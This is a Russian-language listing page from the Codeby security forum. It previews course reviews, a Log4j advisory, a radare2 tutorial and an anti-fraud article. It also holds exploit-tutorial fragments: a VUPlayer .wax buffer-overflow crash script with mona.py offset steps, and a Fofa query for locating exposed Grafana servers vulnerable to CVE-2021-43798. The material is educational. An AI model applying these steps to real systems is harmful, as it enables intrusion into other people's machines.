Кибербезопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

WAPT от лица студента

  • 3 819
  • 1
Привет, Codeby! Хочу немного рассказать о своем опыте прохождения курса.

Я сам студент скромного беларусского вуза, учусь на схемотехника и немного играю в CTF. До попадания на курс имелся небольшой опыт пентеста, в основном полученный на HTB и аналогичных площадках. На курс WAPT я попал после The Standoff, когда Codeby заметили нашу команду Bulba Hackers на 5 месте и помогли получить курс бедным студентам =)

К курсу в самом начале я относился не очень серьезно, даже не открывал методички и не смотрел видео, думая, что там не будет для меня новой информации, но потом я все же нашел для себя много нового, об этом расскажу дальше.

Пассив

После получения впн конфига я сразу же пошел смотреть таски. Первые несколько задач решались довольно быстро, кроме задачи с нахождением реального IP, в этом таске я мучительно пытался сабмитать IP и локацию серверов CDN от CF и даже одного сервера, который светился в Censys, но все они не подходили, все же в один момент мой флаг приняли и я перешел к следующим таскам. Из этого раздела еще запомнился последний таск с пойском сайта игры. Многие стонали от него, но этот таск мне запомнится на долго, хоть он и сдался за...

Статья VUPlayer 2.49 .wax vanilla EIP overflow

  • 2 743
  • 0
Тестрирование проводилось на ОС Windows 7 x32 с отключенным DEP.

Создадим эксплойт триггер чтобы перезаписать регистр EIP.

Python:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

payload = "A"*5000

file = open('exploit.wax', 'w')
print "Create file exploit"
file.write(payload)
print "Write payload"

Запускаем Vuplayer под отладчиком

1640552858368.png


и скармливаем наш файловый сплойт.

1640552874728.png


Как мы видим мы успешно перезаписали EIP регистр. Теперь вычислим смещение до регистра EIP. Воспользуемся плагином mona.py

!mona pc 5000

1640552891943.png


Созданную ASCII строку скопируем в наш сплойт. Затем повторим процесс передачи созданного нами файла в уязвимую программу под отладчиком. Нажимаем Ctrl+F2, F9 и кормим файлом…

1640552907739.png


Как мы видим выполнение программы остановилось. Смотрим на значение регистра EIP, зачем копируем это значение 68423768 для вычисления смещения.

Пишем в панели команд

!mona po 68423768

1640552927331.png
...

КАК Я ПРОХОЖУ КУРС WAPT (КВЕСТ В РЕАЛЬНОМ ВРЕМЕНИ)

  • 10 634
  • 19
ПРИВЕТСТВУЮ, ФОРУМЧАНЕ!!

111111.jpg

Решил присесть за перо, чтобы поделиться своим опытом обучения на курсах WAPT от Cobeby. Я не первый и надеюсь не последний, но я сразу поставил себе задачу написать честный и объективный отзыв без приукрас и приуменьшений. Сразу скажу, я не являюсь членом команды Codeby и не ставлю целью разрекламировать курс для привлечения людей, я просто хочу поделиться своими мыслями - как позитивными, так и негативными.

Сегодня 22 декабря 2021 года, я учусь с 8 декабря и начал писать отзыв сейчас, чтобы просто не забыть все аспекты. В процессе написания, я не буду ничего менять, как бы не изменилось мое отношение ко всему происходящему. Хочу сразу предупредить, что в ходе моего повествования не будет никакого раскрытия решений заданий - в этой среде это не приветствуется. Насколько я помню, даже мэтры, которые пишут гайды по прохождению задач с различных площадок CTF никогда полностью не раскрывают всех мелочей. Без подобной философии не будет прогресса в образовании.

И так, поехали.

ПРЕДЫСТОРИЯ.

Всю свою жизнь я...​

Статья Обход 2FA и методы захвата аккаунта: исследование уязвимостей

  • 9 758
  • 11
2fa (1).jpg

Дисклеймер

Вся представленная информация размещена исключительно в образовательных и исследовательских целях. Автор не рекомендует использовать полученные знания для взлома, нанесения вреда или ущерба. Будьте благоразумны и не нарушайте законы.

Резюме

Различные приложения уже давно слились с нашей повседневностью. В них наши персональные,банковские,личные и другие данные, и их утечка может обойтись очень дорого.

В этой статье я затрону насколько плохим может быть отношение к безопасности на примере довольно крупной компании в СНГ по доставке азиатской пищи. Пытаюсь зарепортить уязвимости. Описываю доказательство концепции. Надеюсь, статья будет интересна для вас.


Введение

Двухфакторная авторизация была придумана для дополнительной безопасности, и помимо стандартного ввода логина и пароля предполагает так же и ввод дополнительного элемента: код из...

Статья По горячим следам: эпизод шесть или как я с костлявой поиграл - дырявый WinRar, BlueKeep, Fake Voice Multi-Tacotron и немного чертовщины: ÿ. & duevile

  • 11 235
  • 17
Пролог и его формальности

BQ8P.gif

Вот здравствуйте, нет, лучше будет написать привет, но это слишком неофициально и неуважительно. Ладно. Проще говоря, я забыл как можно нормально поздороваться, поэтому обойдемся такой вот тщетщиной. Сегодня на повестке дня у нас очередной выпуск из цикла "По горячим следам", здесь вот оставлю ссылки на предыдущие пять частей:

Отзыв о курсе WAPT: особенно касается людей неуверенных в своих собственных силах и новичков

  • 4 619
  • 3
Всем привет, хочу поделиться впечатлениями о прохождении курса WAPT

Немного обо мне

Если говорить о моем опыте в IT то это вышка по КБ, работа сисадмином и разработка ПО. В универе с ИБ дела обстоят плачевно, в студенческие годы моим первым опытом связанным со взломом, это был взлом беспроводных сетей, далее в свободное время смотрел слитые курсы по ИБ, но при виде чьего-нибудь врайтапа о прохождении тачек я вступал в аналитический паралич. Был уже знаком с форумом codeby и увидел у них сравнительно недавно вышедший курс WAPT, почитав о нем и посмотрев отзывы мною было принято решение записаться на него.

Обучение

Тебе выдаются методички, видео материалы и доступ по VPN в лабораторию, где ты будешь решать задания. Решил на минимальный балл задания- тебе предоставляют доступ к следующему блоку курса, также очень круто что есть топ 10 участников курса, добавляется дух соперничества.

wapt.png


На протяжении всего курса с тобой на связи кураторы, которые отзывчиво отвечают на твои тупые вопросы...

Статья "Посылаем сигналы пришельцам через radare2". Самая необходимая информация для использования этого фреймворка.

  • 8 481
  • 9

Доброго времени суток, читатели Codeby! 👋

1639688446400.png


Будем честными. В большинстве случаев ревёрсеры используют IDA в качестве дизассемблера. Но что насчёт других дизассемблеров? Можно ли через терминальные отладчики отлаживать программы без проблем? Например, через radere2. В этой статье мы попытаемся ответить на этот вопрос. Также мы узнаем какая необходимая информация нужна для комфортного использования radare2. Всё рассматривать не будем, так как статья станет одеялом

Powerful_Crackme

Для обучения возьмём лёгкий crackme с crackmes.one. Откроем его в radare2.

Проанализируем файл в radare2 через aaa. Это нужно для полного анализа программы. Мы будем использовать эту команду почти во всех случаях. Если нужно проанализировать что-то конкретное, можно обратиться к справке в radare2...

Заметка Эпидемия CVE-2021-44228 : Security Advisory и Продукты HCL

  • 5 336
  • 6
Минувшие выходные были веселыми для ряда компаний и отдельных разработчиков.
Случилась эпидемия уязвимости log4j одного из популярнейших фреймворков логирования.
Продукты HCL так же проверяются на наличие уязвимости, размещены две страницы с Knowlege base.
Если ссылки не открываются, то ниже есть адресная строка, надо только убрать _ в https

Общая для всех продуктов, откуда можно посмотреть интересующий:

h_ttp_s://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095490

Конкретная по продуктам около Domino:

h_ttp_s://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095516

Информация на страницах будет обновляться по мере проверки ПО.
Сейчас уже известно что Notes/Designer, Xpage, AppDevPack, Traveler , verse - не затронуты данной уязвимостью.
Тем не менее, если вы самостоятельно добавляли данную библиотеку в продукты на базе Domino/Notes/xpage/AppDevPack и выставили сервер с этим приложением "наружу" - вам рекомендовано проверить и устранить уязвимость.

Статья Уязвимость CVE-2021-43798

  • 3 131
  • 2
grafana.png


Добрый день , Уважаемые Форумчане и Друзья. На днях была обнаружена уязвимость в платформе Grafana. При эксплуатации она позволяет получить доступ к произвольным файлам сервера. Причиной стала некорректная работа обработчика пути /public/plugins/. Эксплуатация возможна за счёт наличия предустановленных плагинов.

Уязвимыми оказались версии Grafana 5.0.0,8.0.0-beta3,8.0.0-beta1, 8.0.7 , 8.1.8, 8.2.7, 8.3.1
Причём, первые две версии подвержены уязвимостям CVE-2021-43813 и CVE-2021-43815.

Конечно такой уязвимости был присвоен высокий класс опасности.

grafana5.PNG


Попробуем посмотреть насколько просто проэксплуатировать данную уязвимость. Но для начала в поисковике найдём ресурсы с Grafana. Если для поиска воспользоваться ресурсом Fofa, то достаточно ввести запрос, указав код страны.

app="Grafana" && country="US" && body="v8."

Grafana работает с большим количеством плагинов, поэтому...

Статья Как не стать жертвой телефонных мошенников

  • 11 243
  • 24
Телефонные мошеники 3.jpg

Доброго дня! На данном форуме вы найдете топовых специалистов по ИБ, которые окажут помощь в сложных ситуациях и дадут полезные рекомендации. Я решил присоединиться к ним и подготовил статью, которая поможет не дать телефонным мошенникам опустошить ваши банковские счета.

Итак, начнем. У программного обеспечения всегда есть слабые места. Но каким бы навороченным ни было бы ПО, большинство проблем возникают по причине самого человека. В основном мошенники используют методы социальной инженерии. Им не нужно взламывать программы или похищать смартфоны в метро - все, что им нужно, это просто начать беседу с человеком.

Жулики буквально ломают мозги. Схемы обмана всегда разные, но их цель - выманить ваши деньги. В качестве жертв выступают люди вне зависимости от возраста - обмануть можно не только доверчивую пенсионерку, но и прогрессивного молодого человека.

Вступление:

Для разбора взят часто используемый мошеннический кейс. Из-за него люди часто теряют свои деньги. Ниже будет приведен разбор сценария общения с мошенником с целью показать...
🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

Статистика форума

Темы
51 060
Сообщения
344 862
Пользователи
148 615
Новый пользователь
pioner5552